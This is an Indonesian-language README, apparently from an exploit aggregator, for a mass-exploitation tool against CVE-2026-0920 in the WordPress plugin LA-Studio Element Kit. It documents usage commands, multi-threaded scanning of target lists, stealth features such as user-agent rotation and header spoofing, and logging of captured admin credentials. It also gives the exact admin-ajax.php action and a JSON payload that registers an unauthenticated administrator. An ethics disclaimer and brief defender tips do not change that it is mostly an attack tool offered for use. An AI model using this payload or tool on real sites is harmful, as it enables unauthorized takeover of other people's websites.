Share
## https://sploitus.com/exploit?id=F219D284-1DA2-516E-83BA-7C5086AF0FBA
# CVE-2026-0920 Advanced Mass Exploiter
Unauthenticated Administrator User Creation Exploit for LA-Studio Element Kit for Elementor (โค 1.5.6.3)
---
## โ ๏ธ PERINGATAN & ETIKA
**HANYA GUNAKAN PADA SISTEM YANG ANDA MILIKI ATAU MEMILIKI IZIN TERTULIS!**
Tool ini dibuat untuk tujuan:
- โ
Testing keamanan sistem sendiri
- โ
Penetration testing dengan izin
- โ
Penelitian keamanan siber
- โ
Pendidikan dan awareness
**PENGGUNAAN ILEGAL ADALAH TANGGUNG JAWAB PENGGUNA!**
---
## ๐ Deskripsi Kerentanan
### ๐ Detail CVE
- **CVE ID**: CVE-2026-0920 (Contoh)
- **Plugin**: LA-Studio Element Kit for Elementor
- **Versi Vulnerable**: โค 1.5.6.3
- **Tipe**: Unauthenticated Administrator Registration
- **Risiko**: CRITICAL (CVSS: 9.8)
### ๐ฏ Mekanisme Eksploitasi
Kerentanan ini memungkinkan penyerang membuat akun administrator WordPress tanpa otentikasi melalui endpoint AJAX plugin yang tidak aman.
---
## โจ Fitur Utama
### ๐ **Advanced Detection**
- **WordPress Detection**: Identifikasi otomatis sistem WordPress
- **Plugin Detection**: Deteksi LA-Studio Element Kit
- **Vulnerability Verification**: Verifikasi multi-metode
- **False Positive Reduction**: Minimalkan hasil positif palsu
### โก **Mass Exploitation**
- **Concurrent Scanning**: Multi-threading hingga 50 thread
- **Smart Targeting**: Filter target non-WordPress
- **Rate Limiting**: Delay yang dapat dikonfigurasi
- **Progress Tracking**: Monitoring real-time
### ๐ **Credential Management**
- **Auto-generation**: Buat username dan password otomatis
- **Strong Passwords**: Password acak 16 karakter
- **Realistic Usernames**: Username yang terlihat legit
- **Email Generation**: Email valid untuk registrasi
### ๐ **Reporting & Verification**
- **Dual Verification**: Eksploitasi + Login verification
- **Structured Output**: VLUN_V.txt & VLUN.txt
- **Timestamp Tracking**: Waktu eksploitasi tercatat
- **Success Statistics**: Statistik lengkap hasil scanning
### ๐ก๏ธ **Stealth & Evasion**
- **Random User-Agents**: Rotasi user-agent
- **Request Throttling**: Hindari detection rate limiting
- **SSL Bypass**: Support HTTPS dengan verify=False
- **Header Spoofing**: Header request yang realistis
---
## ๐ Instalasi
### Prerequisites
```bash
# Python 3.7+
python3 --version
# pip package manager
pip --version
```
### Install Dependencies
```bash
# Clone repository
git clone https://github.com/O99099O/By-Poloss..-..CVE-2026-0920.git
cd By-Poloss..-..CVE-2026-0920
# Install requirements
pip install -r requirements.txt
# Atau install manual
pip install requests colorama
```
### Platform Specific
```bash
# Termux (Android)
pkg update && pkg upgrade
pkg install python git
pip install requests colorama
# Kali Linux
sudo apt update
sudo apt install python3 python3-pip
pip3 install requests colorama
# Windows (WSL)
sudo apt update
sudo apt install python3 python3-pip
pip3 install requests colorama
```
---
## โก Penggunaan
### Basic Usage
```bash
# Eksploitasi single target
python3 cve_2026_0920.py targets.txt
# Mode verifikasi saja
python3 cve_2026_0920.py targets.txt -v
# Custom threads dan timeout
python3 cve_2026_0920.py targets.txt -t 20 -T 60
```
### Contoh Lengkap
```bash
# 1. Buat file targets.txt
echo "http://target1.com" >> targets.txt
echo "https://target2.com" >> targets.txt
echo "http://target3.com/wp-admin" >> targets.txt
# 2. Jalankan exploit dengan 15 threads
python3 cve_2026_0920.py targets.txt -t 15
# 3. Verifikasi mode untuk testing awal
python3 cve_2026_0920.py targets.txt -v -t 5
# 4. Exploit dengan timeout lebih lama
python3 cve_2026_0920.py targets.txt -T 45 -t 10
```
### Format targets.txt
```text
# Komentar dengan #
http://target1.com
https://target2.com
http://target3.com/wp-admin
# Skip baris kosong
# Multiple protocols supported
http://example.com
https://example.com
http://192.168.1.1
http://localhost:8080
```
---
## ๐ฏ Mode Operasi
| Mode | Deskripsi | Output Files |
|------|-----------|--------------|
| **Full Exploit** (Default) | Eksploitasi lengkap + verifikasi login | VLUN_V.txt, VLUN.txt |
| **Verify Only** (`-v`) | Hanya deteksi vulnerabilitas | VLUN.txt |
### Proses Workflow
```
1. Input Target โ 2. WordPress Check โ 3. Plugin Detection โ 4. Vulnerability Check
โ
5. Generate Credentials โ 6. Exploitation โ 7. Login Verification โ 8. Save Results
```
---
## ๐ง Parameter & Opsi
```bash
# Basic
python3 cve_2026_0920.py targets.txt
# Advanced Options
python3 cve_2026_0920.py targets.txt \
-t 20 \ # Threads (default: 10)
-T 45 \ # Timeout seconds (default: 30)
-v \ # Verify only mode
-o results/ # Custom output directory
# Help Menu
python3 cve_2026_0920.py --help
```
### Parameter Detail
| Parameter | Deskripsi | Default |
|-----------|-----------|---------|
| `targets_file` | File berisi list target (wajib) | - |
| `-t, --threads` | Jumlah concurrent threads | 10 |
| `-T, --timeout` | Request timeout (seconds) | 30 |
| `-v, --verify` | Verify mode (no exploitation) | False |
| `-o, --output` | Custom output directory | Current dir |
---
## ๐ Output & Reporting
### File Hasil
```
โโโ VLUN_V.txt # Verified exploited (credentials included)
โโโ VLUN.txt # Vulnerable targets (exploit attempted)
โโโ Baner.txt # Custom banner (optional)
```
### Format VLUN_V.txt
```text
[2025-01-18 14:30:22] http://target.com
Login URL: http://target.com/wp-login.php
Username: admin_123
Password: xY7!pQ9@mK4#bN2$
Status: VERIFIED EXPLOITED
--------------------------------------------------------------------------------
```
### Format VLUN.txt
```text
[2025-01-18 14:30:22] http://vuln-target.com
Login URL: http://vuln-target.com/wp-login.php
Status: VULNERABLE
--------------------------------------------------------------------------------
```
### Contoh Output Terminal
```
[โ] Processing: http://target.com
[โ] WordPress with LA-Studio plugin detected: http://target.com
[โ] Vulnerable: http://target.com
[*] Attempt 1: http://target.com
[โ] EXPLOIT SUCCESS: http://target.com
Login: http://target.com/wp-login.php
Username: admin_789
Password: aB3$fG8@jK1#mN6!
```
---
## ๐ก๏ธ Teknik Deteksi
### 1. WordPress Detection
- File signature (`wp-login.php`, `wp-admin/`)
- Meta generator tag
- HTML structure patterns
- Response header analysis
### 2. Plugin Detection
- Directory enumeration (`/wp-content/plugins/`)
- Page source analysis
- AJAX endpoint testing
- CSS/JS file patterns
### 3. Vulnerability Verification
- Multiple payload variations
- Response pattern matching
- JSON response parsing
- Error message analysis
### 4. Exploitation Verification
- Direct login attempt
- Session cookie validation
- Admin page access check
- Dashboard element detection
---
## ๐ Credential Generation
### Username Pattern
```
prefix + "_" + random_digits(3) + suffix
Contoh: admin_123, user_456_web, manager_789_site
```
### Password Strength
```
Length: 16 characters
Charset: A-Z, a-z, 0-9, !@#$%^&*
Contoh: xY7!pQ9@mK4#bN2$
```
### Email Format
```
username@random_domain
Domains: gmail.com, yahoo.com, outlook.com, protonmail.com
```
---
## โ๏ธ Konfigurasi Lanjutan
### Custom Banner
Buat file `Baner.txt` untuk custom ASCII art:
```text
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-0920 EXPLOITER โ
โ BY POLOSS - ADVANCED EDITION โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
### User-Agent Rotation
Script secara otomatis merotasi 5 user-agent berbeda untuk menghindari detection.
### Request Headers
Headers lengkap untuk menyamar sebagai browser asli:
- User-Agent acak
- Accept headers
- Referer spoofing
- X-Requested-With
- Origin header
---
## ๐ Performance Optimization
### Thread Management
```python
# Default: 10 threads (aman untuk kebanyakan sistem)
# Termux: 5 threads direkomendasikan
# High-end: 20-50 threads untuk VPS
```
### Timeout Settings
```python
# Normal: 30 detik
# Slow networks: 45-60 detik
# Local testing: 10-15 detik
```
### Memory Usage
- Clean result handling
- No unnecessary data storage
- Stream processing untuk large target lists
---
## ๐ฏ Target Scope
### Supported Targets
- โ
WordPress dengan LA-Studio Element Kit โค 1.5.6.3
- โ
HTTP & HTTPS
- โ
Custom ports
- โ
IP addresses langsung
### Filter Otomatis
- โ Non-WordPress sites
- โ WordPress tanpa plugin
- โ Plugin versi patched
- โ Sites dengan WAF blocking
---
## ๐จ Troubleshooting
### Common Issues & Solutions
| Issue | Solution |
|-------|----------|
| `ConnectionError` | Periksa jaringan, coba timeout lebih besar |
| `SSL Verification Failed` | Script handle otomatis (verify=False) |
| `No targets processed` | Periksa format targets.txt |
| `Thread errors on Termux` | Kurangi threads (`-t 5`) |
| `Slow performance` | Tingkatkan timeout (`-T 45`) |
| `No results found` | Target mungkin tidak vulnerable |
### Debug Mode
```bash
# Tambahkan debug print di kode
print(f"[DEBUG] Processing: {url}")
print(f"[DEBUG] Response: {resp.status_code}")
print(f"[DEBUG] Content: {resp.text[:200]}")
```
---
## ๐ Referensi Teknis
### Vulnerability Details
- **Endpoint**: `/wp-admin/admin-ajax.php`
- **Action**: `lakit_register_action`
- **Parameters**: `lakit_user`, `lakit_email`, `lakit_password`, `lakit_bkrole`
- **Required**: `lakit_agree=on`
### Payload Structure
```json
{
"action": "lakit_register_action",
"lakit_user": "username",
"lakit_email": "email@domain.com",
"lakit_password": "password",
"lakit_confirm_password": "password",
"lakit_bkrole": "administrator",
"security": "",
"lakit_agree": "on"
}
```
### Response Patterns
```json
// Success Response
{"success": true, "message": "Registration successful"}
// Error Response (masih vulnerable)
{"success": false, "message": "Username already exists"}
```
---
## ๐ Security Considerations
### Untuk Defender
1. **Update Plugin**: Versi terbaru LA-Studio Element Kit
2. **Input Validation**: Sanitize semua user input
3. **Capability Check**: Verifikasi user permissions
4. **Nonce Verification**: Implement security nonces
5. **Log Monitoring**: Monitor suspicious registration attempts
### Untuk Peneliti
1. **Authorization Check**: Selama verifikasi capability
2. **Rate Limiting**: Batasi request ke admin-ajax.php
3. **Input Sanitization**: Filter semua parameter
4. **Output Encoding**: Prevent XSS pada response
---
## ๐ Lisensi
MIT License - Lihat [LICENSE](LICENSE) untuk detail lengkap.
```
Copyright (c) 2026 BY POLOSS
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
1. Hanya digunakan untuk testing sistem sendiri atau dengan izin tertulis
2. Tidak digunakan untuk aktivitas ilegal
3. Penulis tidak bertanggung jawab atas penyalahgunaan
```
---
## ๐จโ๐ป Developer
**BY POLOSS**
- GitHub: [@O99099O](https://github.com/O99099O)
- Project: [CVE-2026-0920 Exploiter](https://github.com/O99099O/By-Poloss..-..CVE-2026-0920)
---
## ๐ Statistics
---
## ๐ Changelog
### v1.0.0 (Initial Release)
- โ
Advanced WordPress detection
- โ
Plugin-specific vulnerability checking
- โ
Mass exploitation with threading
- โ
Credential generation and verification
- โ
Comprehensive reporting system
- โ
Stealth features (UA rotation, headers)
### v1.1.0 (Planned)
- ๐ Proxy support
- ๐ Custom payload configuration
- ๐ Enhanced WAF bypass
- ๐ JSON export format
- ๐ Performance improvements
---
## ๐ค Contributing
1. Fork repository
2. Create feature branch (`git checkout -b feature/AmazingFeature`)
3. Commit changes (`git commit -m 'Add AmazingFeature'`)
4. Push to branch (`git push origin feature/AmazingFeature`)
5. Open Pull Request
**Bug Reports & Suggestions**: [GitHub Issues](https://github.com/O99099O/By-Poloss..-..CVE-2026-0920/issues)
---
## ๐ Acknowledgments
- WordPress Security Team
- LA-Studio for prompt patching
- Security researchers community
- Open-source tools developers
---
๐ ๐๐๐๐๐ ๐๐๐ ๐ต๐๐ ๐
๐๐๐๐๐๐๐! ๐
BY POLOSS โข January 2026
Advanced โข Accurate โข Professional Security Tool